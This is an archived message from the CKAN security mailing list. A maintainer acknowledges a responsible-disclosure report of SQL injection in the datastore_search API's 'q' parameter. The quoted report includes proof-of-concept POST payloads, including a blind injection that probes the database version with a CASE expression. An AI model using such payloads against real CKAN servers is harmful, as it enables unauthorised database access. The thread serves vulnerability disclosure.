[CKAN-Security] SQL Injection Vulnerability

• Previous message: [CKAN-Security] SQL Injection Vulnerability
• Next message: [CKAN-Security] SQL Injection Vulnerability
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi Gonzalo,

Thanks for your report. We will assess it as soon as possible and get
back to you.

Best,

Adrià

On 8 June 2018 at 12:37, Gonzalo Garcia | ODS Red Team
<gonzalo.g at opendatasecurity.io> wrote:
> Hi, I've found a SQL Injection vulnerability on
> /api/3/action/datastore_search. I've exploited it on "q" parameter, but
> maybe other parameters are affected too.
>
> Example POST data:
> Query fails
> {"resource_id":"38a8888c-30fd-4002-810e-6b7fe87a6fb2","q":" ' "
> ,"filters":{},"limit":100,"offset":0}
>
> Query doesn't fail because PostgreSQL version string is "PostrgreSQL..." and
> "o" is the second char of the string.
> {"resource_id":"38a8888c-30fd-4002-810e-6b7fe87a6fb2","q":"'|| (SELECT CASE
> substr(version(),2,1) WHEN 'o' THEN 'A' ELSE sleep(5) END) ||'"
> ,"filters":{},"limit":100,"offset":0}
> _______________________________________________
> CKAN security
> https://lists.okfn.org/mailman/listinfo/security
> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>
> Repo: https://github.com/ckan/ckan-security

• Previous message: [CKAN-Security] SQL Injection Vulnerability
• Next message: [CKAN-Security] SQL Injection Vulnerability
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]